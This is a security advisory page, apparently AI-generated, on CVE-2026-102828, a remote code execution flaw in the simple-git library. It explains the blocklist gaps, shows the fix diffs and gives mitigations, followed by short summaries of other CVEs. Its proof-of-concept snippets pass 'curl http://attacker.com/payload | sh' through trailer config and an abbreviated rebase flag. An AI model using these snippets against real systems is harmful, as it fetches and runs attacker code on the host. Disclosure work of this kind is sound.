CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-102828

CVE-2026-102828: Remote Code Execution via Configuration and Argument Injection in simple-git

Amit Schendel
Amit Schendel
Senior Security Researcher

Oct 6, 2026·5 min read·3 visits

Executive Summary (TL;DR)

Incomplete configuration blocklists and argument parsing discrepancies in simple-git prior to version 4.0.1 allow remote attackers to achieve arbitrary shell command execution via trailer commands and rebase parameters.

A critical remote code execution vulnerability (CVE-2026-102828) exists in simple-git versions 3.15.0 through 4.0.0. The vulnerability is caused by an incomplete blocklist within the library's default safety enforcement plugin, blockUnsafeOperationsPlugin. Attackers who can control Git configuration arguments or supply command flags to rebase operations can execute arbitrary system commands with the privileges of the parent Node.js process.

Vulnerability Overview

The Node.js library simple-git acts as an abstraction layer over the host system's git command-line executable. It uses Node.js's native child process spawning modules to run shell-level actions. Because Git configurations allow severe command execution options, the application trust boundary relies entirely on simple-git blocking dangerous parameters before launching child processes.

To enforce this trust boundary, the library introduced the blockUnsafeOperationsPlugin starting in version 3.15.0. This component functions as an input-filtering engine that intercepts downstream arguments. It references a static blocklist of dangerous configuration options (such as protocol.ext.allow) to neutralize the risk of parameter injection and local command execution.

However, prior to version 4.0.1, this blocklist was incomplete. It did not prevent the configuration of Git's trailer parsing options (trailer.<token>.cmd and trailer.<token>.command), nor did it safely evaluate the -x and --exec options during interactive and non-interactive git rebase operations. Attackers can leverage these gaps to execute arbitrary system commands, bypassing existing input sanitation policies.

Root Cause Analysis

The root cause of this vulnerability lies in the design limitation of blocklist-based validation (CWE-184). The blockUnsafeOperationsPlugin assumes that all vectors of code execution inside native Git options can be manually enumerated. This assumption is flawed due to the complexity of Git's subcommand architecture and configuration options.

Git's interpret-trailers utility is designed to parse commit messages for metadata keys. It permits administrators or repository setups to configure external command scripts to evaluate trailer values dynamically via the trailer.<token>.cmd configuration. When a repository operation triggers metadata generation, Git invokes the configured command string within a shell execution context.

Because simple-git's parser did not monitor the trailer.*.cmd and trailer.*.command keys, an attacker capable of passing custom configuration overrides (such as using the -c inline configuration parameter) could define a malicious command handler. Additionally, the library failed to block command-injection options under the rebase subcommand. Git natively supports short-hand abbreviations of long flags, allowing --ex, --exe, and --exec to execute shell commands after commits during rebase procedures. The simple-git input parser lacked regular expressions to cover these abbreviated arguments, allowing complete bypass of the --exec check.

Code Analysis

The vulnerability was fixed in the codebase under version 4.0.1. A review of the differences in the vulnerability parser shows how the blocklist rules and validation systems were updated.

In packages/argv-parser/src/vulnerabilities/detect-vulnerable-config-writes.ts, the blocklist was updated to explicitly block wildcard configurations of trailer command variables:

// Before modification:
const preventUnsafeConfig = [
   preventConfigBuilder('sequence.editor', 'allowUnsafeEditor'),
   preventExpandedConfigBuilder('submodule.update', 'allowUnsafeSubmodule'),
   preventExpandedConfigBuilder('tar.command', 'allowUnsafeCommandBinaries'),
   preventExpandedConfigBuilder('url.insteadOf', 'allowUnsafeUrlRewrite'),
];
 
// After modification (Patch Applied):
const preventUnsafeConfig = [
   preventConfigBuilder('sequence.editor', 'allowUnsafeEditor'),
   preventExpandedConfigBuilder('submodule.update', 'allowUnsafeSubmodule'),
   preventExpandedConfigBuilder('tar.command', 'allowUnsafeCommandBinaries'),
+  preventExpandedConfigBuilder('trailer.cmd', 'allowUnsafeCommandBinaries'),
+  preventExpandedConfigBuilder('trailer.command', 'allowUnsafeCommandBinaries'),
   preventExpandedConfigBuilder('url.insteadOf', 'allowUnsafeUrlRewrite'),
];

In packages/argv-parser/src/vulnerabilities/detect-vulnerable-flags.ts, regex patterns were introduced to intercept the rebase command-execution configurations. It evaluates the exact boundaries and checks Git's parsing of abbreviated options (--ex and --exe matching --exec):

// Regex updates to restrict the rebase command execution parameters:
preventFlagBuilder('rebase', /^(-x|--ex(ec?)?)$/, 'allowUnsafeExec', { name: '-x or --exec' }),

Finally, packages/argv-parser/src/tokens/flag-specs.ts registered command specification mappings for rebase, preventing unexpected arguments from bypassing normal option tokenization checks.

Attack Methodology and Proof-of-Concept

To exploit this vulnerability, an attacker must target a Node.js application that uses simple-git and permits external parameters to dictate configuration arguments or repository execution flags.

For example, if an interface exposes the capability to set custom config arguments, an attacker could supply:

import { simpleGit } from 'simple-git';
 
// The following configuration bypasses blocklist controls in < 4.0.1:
await simpleGit().raw([
   'commit',
   '-c',
   'trailer.exploit.cmd=curl http://attacker.com/payload | sh',
   '-m',
   'Trigger Commit'
]);

During execution, Git's parser resolves the trailer configuration, triggers a shell environment, and executes the specified HTTP download utility. The same vulnerability occurs when invoking the rebase option with short-hand options:

import { simpleGit } from 'simple-git';
 
// Bypasses the '--exec' filter by using Git's option parser abbreviation logic:
await simpleGit().rebase(['--ex', 'curl http://attacker.com/payload | sh']);

Impact Assessment & Residual Risks

The impact of successful exploitation is arbitrary remote code execution (RCE) on the host operating system. The commands run under the same OS privileges as the active Node.js process. If the application runs inside a container with administrative privileges, this vulnerability could lead to total host compromise, lateral network movement, and database exfiltration.

Although version 4.0.1 fixes the known paths for trailer.*.cmd and rebase argument abbreviation, blocklist architectures still carry risks. Git supports a complex ecosystem of configurations that allow shell execution, such as core.pager, gpg.program, and custom difference-viewing drivers. If a downstream web application accepts unvalidated user options, further parser bypasses could emerge.

Security teams should monitor simple-git instances and prohibit passing arbitrary options to configuration parameters. Developers must use structural parameter objects instead of plain user strings inside simple-git execution methods.

Remediation and Mitigation Guidelines

The primary remediation step is upgrading the simple-git npm package to version 4.0.1 or higher. This update applies the correct regex-based checks for command arguments and trailer settings.

npm install simple-git@4.0.1

If you cannot update immediately, you can implement a workaround by ensuring that the library's unsafe settings are explicitly disabled in your code:

import { simpleGit } from 'simple-git';
 
// Enforce strict default controls
const git = simpleGit({
   unsafe: {
      allowUnsafeCommandBinaries: false,
      allowUnsafeExec: false
   }
});

Additionally, apply strict input validation. Avoid passing dynamic user input directly into configuration command matrices. Strip non-alphanumeric characters from input parameters, and ensure that only allowed keys are processed by the repository execution engines.

Fix Analysis (1)

Technical Appendix

CVSS Score
9.2/ 10
CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS Probability
0.27%
Top 82% most exploited

Affected Systems

Node.js applications integrating simple-git prior to version 4.0.1

Affected Versions Detail

Product
Affected Versions
Fixed Version
simple-git
steveukx
>= 3.15.0, < 4.0.14.0.1
AttributeDetail
CWE IDCWE-78, CWE-184
Attack VectorNetwork
CVSS Base Score9.2 (Critical)
EPSS Score0.00275 (0.27% probability of exploitation)
Exploit StatusProof-of-Concept
CISA KEV StatusNot Listed

MITRE ATT&CK Mapping

T1059Command and Scripting Interpreter
Execution
CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

The software constructs an OS command using externally-influenced input, but it does not neutralize or incorrectly neutralizes special elements that can modify the intended OS command when it is sent to a downstream component.

References & Sources

  • [1]CVE Official Record
  • [2]NVD Directory Entry
  • [3]GitHub Security Advisory
  • [4]Official Security Patch Commit
  • [5]GitHub Pull Request #1198
  • [6]Release simple-git@4.0.1 Tag

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 1 hour ago•CVE-2026-102829
9.2

CVE-2026-102829: Security Control Bypass and Command Injection via VISUAL Environment Variable in @simple-git/argv-parser

A critical security control bypass vulnerability exists in @simple-git/argv-parser before version 2.0.1. The package fails to map the VISUAL environment variable to the allowUnsafeEditor rule, allowing attackers who control environment parameters to execute arbitrary commands when Git triggers an interactive editor fallback.

Alon Barad
Alon Barad
4 views•5 min read
•about 2 hours ago•CVE-2026-105752
3.1

CVE-2026-105752: Cross-Tenant Prefix-Cache Information Leak via Cache Salt Omission in vLLM Harmony Path

A vulnerability in vLLM prior to 0.30.0 allows an authenticated multi-tenant attacker to infer execution history and prompt structures of other tenants. The multi-turn Responses API ('Harmony' path) fails to propagate the 'cache_salt' parameter during tool-call continuation steps, storing sensitive prompt prefixes in the global, unsalted cache space.

Alon Barad
Alon Barad
8 views•7 min read
•about 3 hours ago•CVE-2026-105753
6.5

CVE-2026-105753: Reachable Assertion in vLLM Multimodal IPC Cache Leading to Denial of Service

A state desynchronization (cache drift) vulnerability exists in the multimodal Inter-Process Communication (IPC) Least Recently Used (LRU) caches of vLLM. When a multimodal request fails validation after its media hash has been registered on the frontend but before the payload is committed to the backend engine core, the frontend and backend caches drift out of lockstep. A subsequent request reusing the same media triggers an assertion failure in the backend engine core, resulting in a complete denial of service.

Alon Barad
Alon Barad
8 views•5 min read
•about 4 hours ago•CVE-2026-105750
5.9

CVE-2026-105750: Local File Disclosure in Docling via Permissive HTML Rendering Requests Filter

CVE-2026-105750 is a medium-severity local file disclosure vulnerability affecting the Docling and Docling-Slim libraries. When processing HTML documents using the optional Playwright rendering backend, the application fail to validate and restrict request URIs using the file:// scheme. This permits an attacker supplying a crafted HTML file to access, render, and exfiltrate local system files.

Alon Barad
Alon Barad
9 views•7 min read
•about 5 hours ago•CVE-2026-102598
6.3

CVE-2026-102598: Remote Denial of Service via NTFS Alternate Data Stream Bypass in Werkzeug safe_join

CVE-2026-102598 is a security bypass and Denial of Service (DoS) vulnerability in the Werkzeug WSGI web application library. In versions prior to 3.1.9, the library's safe_join function fails to sanitize Windows reserved device names containing an empty NTFS Alternate Data Stream (ADS) marker (such as NUL:). This allows remote, unauthenticated attackers to trigger indefinite thread-blocking operations on Windows hosts, resulting in application-wide resource exhaustion.

Alon Barad
Alon Barad
10 views•7 min read
•about 6 hours ago•CVE-2026-103921
7.4

CVE-2026-103921: TLS Certificate Validation Bypass in @graphql-tools/executor-legacy-ws

A vulnerability in @graphql-tools/executor-legacy-ws prior to version 1.1.35 hardcodes the TLS rejectUnauthorized setting to false for outgoing secure WebSocket (wss://) connections. This defect allows unauthenticated remote attackers to perform Adversary-in-the-Middle (MitM) attacks, capturing or tampering with sensitive connection payloads and subscription data.

Alon Barad
Alon Barad
10 views•6 min read